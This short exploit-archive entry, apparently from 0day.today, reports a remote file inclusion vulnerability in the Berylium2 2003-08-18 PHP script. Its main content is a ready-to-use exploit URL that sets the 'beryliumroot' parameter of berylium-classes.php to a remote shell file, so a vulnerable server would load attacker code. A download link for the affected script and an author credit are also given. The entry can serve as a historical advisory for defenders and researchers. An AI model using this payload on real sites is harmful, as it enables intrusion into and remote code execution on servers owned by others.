id: 1845
date: 05/06/2007
title: Berylium2 2003-08-18 (beryliumroot) Remote File Inclusion Vulnerability
author: ThE TiGeR
cves: 

=======================================================================
Berylium2 2003-08-18 (beryliumroot) Remote File Inclusion Vulnerability
=======================================================================



#Berylium2 Remote file inclusion

#Download script : http://berylium.org/source/be2-2003-08-18.tar.gz

#Exploit :

#http://victim.com/[berylium2_path]/code/berylium-classes.php?beryliumroot=shell.txt?

#Discovered by : ThE TiGeR

#Greetz : ™~${{BraveHeart}}$~™ 



#  0day.today [2023-03-23]  #